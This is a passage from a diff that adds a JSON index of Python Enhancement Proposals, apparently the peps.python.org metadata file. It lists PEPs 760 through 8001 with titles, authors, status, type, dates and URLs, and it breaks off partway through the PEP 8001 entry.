"Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "02-Oct-2024", + "python_version": "3.14", + "post_history": "`09-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0760/" + }, + "761": { + "number": 761, + "title": "Deprecating PGP signatures for CPython artifacts", + "authors": "Seth Michael Larson", + "discussions_to": "https://discuss.python.org/t/pep-761-deprecating-pgp-signatures-for-cpython-artifacts/67180", + "status": "Active", + "type": "Process", + "topic": "", + "created": "08-Oct-2024", + "python_version": "3.14", + "post_history": "`25-Sep-2024 `__, `09-Oct-2024 `__", + "resolution": "`06-Nov-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0761/" + }, + "762": { + "number": 762, + "title": "REPL-acing the default REPL", + "authors": "Pablo Galindo Salgado, \u0141ukasz Langa, Lysandros Nikolaou, Emily Morehouse-Valcarcel", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "11-Oct-2024", + "python_version": "3.13", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0762/" + }, + "763": { + "number": 763, + "title": "Limiting deletions on PyPI", + "authors": "William Woodruff, Alexis Challande", + "discussions_to": "https://discuss.python.org/t/69487", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "24-Oct-2024", + "python_version": null, + "post_history": "`09-Jul-2022 `__, `01-Oct-2024 `__, `28-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0763/" + }, + "765": { + "number": 765, + "title": "Disallow return/break/continue that exit a finally block", + "authors": "Irit Katriel, Alyssa Coghlan", + "discussions_to": "https://discuss.python.org/t/pep-765-disallow-return-break-continue-that-exit-a-finally-block/71348", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "15-Nov-2024", + "python_version": "3.14", + "post_history": "`09-Nov-2024 `__, `16-Nov-2024 `__,", + "resolution": null, + "requires": null, + "replaces": "601", + "superseded_by": null, + "url": "https://peps.python.org/pep-0765/" + }, + "766": { + "number": 766, + "title": "Explicit Priority Choices Among Multiple Indexes", + "authors": "Michael Sarahan", + "discussions_to": "https://discuss.python.org/t/pep-for-handling-multiple-indexes-index-priority/71589", + "status": "Draft", + "type": "Informational", + "topic": "packaging", + "created": "18-Nov-2024", + "python_version": null, + "post_history": "`18-Nov-2024 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0766/" + }, + "767": { + "number": 767, + "title": "Annotating Read-Only Attributes", + "authors": "Eneg", + "discussions_to": "https://discuss.python.org/t/pep-767-annotating-read-only-attributes/73408", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "18-Nov-2024", + "python_version": "3.14", + "post_history": "`09-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0767/" + }, + "768": { + "number": 768, + "title": "Safe external debugger interface for CPython", + 
"authors": "Pablo Galindo Salgado, Matt Wozniski, Ivona Stojanovic", + "discussions_to": "https://discuss.python.org/t/pep-768-safe-external-debugger-interface-for-cpython/73969", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "25-Nov-2024", + "python_version": "3.14", + "post_history": "`11-Dec-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0768/" + }, + "777": { + "number": 777, + "title": "How to Re-invent the Wheel", + "authors": "Ethan Smith", + "discussions_to": "https://discuss.python.org/t/pep-777-how-to-re-invent-the-wheel/67484", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "09-Oct-2024", + "python_version": null, + "post_history": "`10-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0777/" + }, + "789": { + "number": 789, + "title": "Preventing task-cancellation bugs by limiting yield in async generators", + "authors": "Zac Hatfield-Dodds, Nathaniel J. Smith", + "discussions_to": "https://discuss.python.org/t/preventing-yield-inside-certain-context-managers/1091", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "14-May-2024", + "python_version": "3.14", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0789/" + }, + "801": { + "number": 801, + "title": "Reserved", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "21-Jun-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0801/" + }, + "2026": { + "number": 2026, + "title": "Calendar versioning for Python", + "authors": "Hugo van Kemenade", + "discussions_to": "https://discuss.python.org/t/pep-2026-calendar-versioning-for-python/55782", + "status": "Draft", + "type": "Process", + "topic": "", + "created": "11-Jun-2024", + "python_version": "3.26", + "post_history": "`14-Jun-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-2026/" + }, + "3000": { + "number": 3000, + "title": "Python 3000", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "05-Apr-2006", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3000/" + }, + "3001": { + "number": 3001, + "title": "Procedure for reviewing and improving standard library modules", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "05-Apr-2006", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3001/" + }, + "3002": { + "number": 3002, + "title": "Procedure for Backwards-Incompatible Changes", + "authors": "Steven Bethard", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "27-Mar-2006", + "python_version": null, + "post_history": "27-Mar-2006, 13-Apr-2006", + "resolution": 
null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3002/" + }, + "3003": { + "number": 3003, + "title": "Python Language Moratorium", + "authors": "Brett Cannon, Jesse Noller, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "21-Oct-2009", + "python_version": null, + "post_history": "03-Nov-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3003/" + }, + "3099": { + "number": 3099, + "title": "Things that will Not Change in Python 3000", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "04-Apr-2006", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3099/" + }, + "3100": { + "number": 3100, + "title": "Miscellaneous Python 3.0 Plans", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "20-Aug-2004", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3100/" + }, + "3101": { + "number": 3101, + "title": "Advanced String Formatting", + "authors": "Talin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Apr-2006", + "python_version": "3.0", + "post_history": "28-Apr-2006, 06-May-2006, 10-Jun-2007, 14-Aug-2007, 14-Sep-2008", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3101/" + }, + "3102": { + "number": 3102, + "title": "Keyword-Only Arguments", + "authors": "Talin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Apr-2006", + "python_version": "3.0", + "post_history": "28-Apr-2006, 19-May-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3102/" + }, + "3103": { + "number": 3103, + "title": "A Switch/Case Statement", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "25-Jun-2006", + "python_version": "3.0", + "post_history": "26-Jun-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3103/" + }, + "3104": { + "number": 3104, + "title": "Access to Names in Outer Scopes", + "authors": "Ka-Ping Yee", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Oct-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3104/" + }, + "3105": { + "number": 3105, + "title": "Make print a function", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Nov-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3105/" + }, + "3106": { + "number": 3106, + "title": "Revamping dict.keys(), 
.values() and .items()", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Dec-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3106/" + }, + "3107": { + "number": 3107, + "title": "Function Annotations", + "authors": "Collin Winter, Tony Lownds", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Dec-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3107/" + }, + "3108": { + "number": 3108, + "title": "Standard Library Reorganization", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Jan-2007", + "python_version": "3.0", + "post_history": "28-Apr-2008", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3108/" + }, + "3109": { + "number": 3109, + "title": "Raising Exceptions in Python 3000", + "authors": "Collin Winter", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Jan-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3109/" + }, + "3110": { + "number": 3110, + "title": "Catching Exceptions in Python 3000", + "authors": "Collin Winter", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Jan-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3110/" + }, + "3111": { + "number": 3111, + "title": "Simple input built-in in Python 3000", + "authors": "Andre Roberge", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Sep-2006", + "python_version": "3.0", + "post_history": "22-Dec-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3111/" + }, + "3112": { + "number": 3112, + "title": "Bytes literals in Python 3000", + "authors": "Jason Orendorff", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Feb-2007", + "python_version": "3.0", + "post_history": "23-Feb-2007", + "resolution": null, + "requires": "358", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3112/" + }, + "3113": { + "number": 3113, + "title": "Removal of Tuple Parameter Unpacking", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Mar-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3113/" + }, + "3114": { + "number": 3114, + "title": "Renaming iterator.next() to iterator.__next__()", + "authors": "Ka-Ping Yee", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "04-Mar-2007", + 
"python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3114/" + }, + "3115": { + "number": 3115, + "title": "Metaclasses in Python 3000", + "authors": "Talin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "07-Mar-2007", + "python_version": "3.0", + "post_history": "11-Mar-2007, 14-Mar-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3115/" + }, + "3116": { + "number": 3116, + "title": "New I/O", + "authors": "Daniel Stutzbach, Guido van Rossum, Mike Verdone", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Feb-2007", + "python_version": "3.0", + "post_history": "26-Feb-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3116/" + }, + "3117": { + "number": 3117, + "title": "Postfix type declarations", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Apr-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3117/" + }, + "3118": { + "number": 3118, + "title": "Revising the buffer protocol", + "authors": "Travis Oliphant, Carl Banks", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Aug-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3118/" + }, + "3119": { + "number": 3119, + "title": "Introducing Abstract Base Classes", + "authors": "Guido van Rossum, Talin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Apr-2007", + "python_version": "3.0", + "post_history": "26-Apr-2007, 11-May-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3119/" + }, + "3120": { + "number": 3120, + "title": "Using UTF-8 as the default source encoding", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Apr-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3120/" + }, + "3121": { + "number": 3121, + "title": "Extension Module Initialization and Finalization", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Apr-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3121/" + }, + "3122": { + "number": 3122, + "title": "Delineation of the main module", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "27-Apr-2007", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, 
+ "url": "https://peps.python.org/pep-3122/" + }, + "3123": { + "number": 3123, + "title": "Making PyObject_HEAD conform to standard C", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Apr-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3123/" + }, + "3124": { + "number": 3124, + "title": "Overloading, Generic Functions, Interfaces, and Adaptation", + "authors": "Phillip J. Eby", + "discussions_to": "python-3000@python.org", + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "28-Apr-2007", + "python_version": null, + "post_history": "30-Apr-2007", + "resolution": null, + "requires": "3107, 3115, 3119", + "replaces": "245, 246", + "superseded_by": null, + "url": "https://peps.python.org/pep-3124/" + }, + "3125": { + "number": 3125, + "title": "Remove Backslash Continuation", + "authors": "Jim J. Jewett", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Apr-2007", + "python_version": null, + "post_history": "29-Apr-2007, 30-Apr-2007, 04-May-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3125/" + }, + "3126": { + "number": 3126, + "title": "Remove Implicit String Concatenation", + "authors": "Jim J. Jewett, Raymond Hettinger", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Apr-2007", + "python_version": null, + "post_history": "29-Apr-2007, 30-Apr-2007, 07-May-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3126/" + }, + "3127": { + "number": 3127, + "title": "Integer Literal Support and Syntax", + "authors": "Patrick Maupin", + "discussions_to": "python-3000@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "14-Mar-2007", + "python_version": "3.0", + "post_history": "18-Mar-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3127/" + }, + "3128": { + "number": 3128, + "title": "BList: A Faster List-like Type", + "authors": "Daniel Stutzbach", + "discussions_to": "python-3000@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "30-Apr-2007", + "python_version": "2.6, 3.0", + "post_history": "30-Apr-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3128/" + }, + "3129": { + "number": 3129, + "title": "Class Decorators", + "authors": "Collin Winter", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-May-2007", + "python_version": "3.0", + "post_history": "07-May-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3129/" + }, + "3130": { + "number": 3130, + "title": "Access to Current Module/Class/Function", + "authors": "Jim J. 
Jewett", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "22-Apr-2007", + "python_version": "3.0", + "post_history": "22-Apr-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3130/" + }, + "3131": { + "number": 3131, + "title": "Supporting Non-ASCII Identifiers", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-May-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3131/" + }, + "3132": { + "number": 3132, + "title": "Extended Iterable Unpacking", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Apr-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3132/" + }, + "3133": { + "number": 3133, + "title": "Introducing Roles", + "authors": "Collin Winter", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-May-2007", + "python_version": "3.0", + "post_history": "13-May-2007", + "resolution": null, + "requires": "3115, 3129", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3133/" + }, + "3134": { + "number": 3134, + "title": "Exception Chaining and Embedded Tracebacks", + "authors": "Ka-Ping Yee", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-May-2005", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3134/" + }, + "3135": { + "number": 3135, + "title": "New Super", + "authors": "Calvin Spealman, Tim Delaney, Lie Ryan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Apr-2007", + "python_version": "3.0", + "post_history": "`28-Apr-2007 `__, `29-Apr-2007 `__, `29-Apr-2007 `__, `14-May-2007 `__, `12-Mar-2009 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3135/" + }, + "3136": { + "number": 3136, + "title": "Labeled break and continue", + "authors": "Matt Chisholm", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "30-Jun-2007", + "python_version": "3.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3136/" + }, + "3137": { + "number": 3137, + "title": "Immutable Bytes and Mutable Buffer", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Sep-2007", + "python_version": "3.0", + "post_history": "26-Sep-2007, 30-Sep-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3137/" + }, + "3138": { + "number": 3138, + "title": "String representation in Python 3000", + "authors": "Atsuo Ishimoto", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": 
"", + "created": "05-May-2008", + "python_version": "3.0", + "post_history": "05-May-2008, 05-Jun-2008", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3138/" + }, + "3139": { + "number": 3139, + "title": "Cleaning out sys and the \"interpreter\" module", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "04-Apr-2008", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3139/" + }, + "3140": { + "number": 3140, + "title": "str(container) should call str(item), not repr(item)", + "authors": "Oleg Broytman, Jim J. Jewett", + "discussions_to": "python-3000@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "27-May-2008", + "python_version": null, + "post_history": "28-May-2008", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3140/" + }, + "3141": { + "number": 3141, + "title": "A Type Hierarchy for Numbers", + "authors": "Jeffrey Yasskin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Apr-2007", + "python_version": "3.0", + "post_history": "25-Apr-2007, 16-May-2007, 02-Aug-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3141/" + }, + "3142": { + "number": 3142, + "title": "Add a \"while\" clause to generator expressions", + "authors": "Gerald Britton", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "12-Jan-2009", + "python_version": "3.0", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2013-May/126136.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3142/" + }, + "3143": { + "number": 3143, + "title": "Standard daemon process library", + "authors": "Ben Finney", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "26-Jan-2009", + "python_version": "3.x", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3143/" + }, + "3144": { + "number": 3144, + "title": "IP Address Manipulation Library for the Python Standard Library", + "authors": "Peter Moody", + "discussions_to": "ipaddr-py-dev@googlegroups.com", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "06-Feb-2012", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2012-May/119474.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3144/" + }, + "3145": { + "number": 3145, + "title": "Asynchronous I/O For subprocess.Popen", + "authors": "Eric Pruitt, Charles R. 
McCreary, Josiah Carlson", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "04-Aug-2009", + "python_version": "3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3145/" + }, + "3146": { + "number": 3146, + "title": "Merging Unladen Swallow into CPython", + "authors": "Collin Winter, Jeffrey Yasskin, Reid Kleckner", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "01-Jan-2010", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3146/" + }, + "3147": { + "number": 3147, + "title": "PYC Repository Directories", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Dec-2009", + "python_version": "3.2", + "post_history": "30-Jan-2010, 25-Feb-2010, 03-Mar-2010, 12-Apr-2010", + "resolution": "https://mail.python.org/pipermail/python-dev/2010-April/099414.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3147/" + }, + "3148": { + "number": 3148, + "title": "futures - execute computations asynchronously", + "authors": "Brian Quinlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Oct-2009", + "python_version": "3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3148/" + }, + "3149": { + "number": 3149, + "title": "ABI version tagged .so files", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Jul-2010", + "python_version": "3.2", + "post_history": "14-Jul-2010, 22-Jul-2010", + "resolution": "https://mail.python.org/pipermail/python-dev/2010-September/103408.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3149/" + }, + "3150": { + "number": 3150, + "title": "Statement local namespaces (aka \"given\" clause)", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "09-Jul-2010", + "python_version": "3.4", + "post_history": "14-Jul-2010, 21-Apr-2011, 13-Jun-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3150/" + }, + "3151": { + "number": 3151, + "title": "Reworking the OS and IO exception hierarchy", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "21-Jul-2010", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2011-October/114033.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3151/" + }, + "3152": { + "number": 3152, + "title": "Cofunctions", + "authors": "Gregory Ewing", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "13-Feb-2009", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + 
"url": "https://peps.python.org/pep-3152/" + }, + "3153": { + "number": 3153, + "title": "Asynchronous IO support", + "authors": "Laurens Van Houtven", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "29-May-2011", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "3156", + "url": "https://peps.python.org/pep-3153/" + }, + "3154": { + "number": 3154, + "title": "Pickle protocol version 4", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Aug-2011", + "python_version": "3.4", + "post_history": "`12-Aug-2011 `__", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130439.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3154/" + }, + "3155": { + "number": 3155, + "title": "Qualified name for classes and functions", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "29-Oct-2011", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2011-November/114545.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3155/" + }, + "3156": { + "number": 3156, + "title": "Asynchronous IO Support Rebooted: the \"asyncio\" Module", + "authors": "Guido van Rossum", + "discussions_to": "python-tulip@googlegroups.com", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Dec-2012", + "python_version": "3.3", + "post_history": "21-Dec-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130419.html", + "requires": null, + "replaces": "3153", + "superseded_by": null, + "url": "https://peps.python.org/pep-3156/" + }, + "3333": { + "number": 3333, + "title": "Python Web Server Gateway Interface v1.0.1", + "authors": "Phillip J. Eby", + "discussions_to": "web-sig@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "26-Sep-2010", + "python_version": null, + "post_history": "26-Sep-2010, 04-Oct-2010", + "resolution": null, + "requires": null, + "replaces": "333", + "superseded_by": null, + "url": "https://peps.python.org/pep-3333/" + }, + "8000": { + "number": 8000, + "title": "Python Language Governance Proposal Overview", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "24-Aug-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8000/" + }, + "8001": { + "number": 8001, + "title": "Python Governance Voting Process", + "authors": "Brett Cannon, Christian Heimes, Donald Stufft, Eric Snow, Gregory P. Smith, \u0141ukasz Langa, Mariatta, Nathaniel J. 
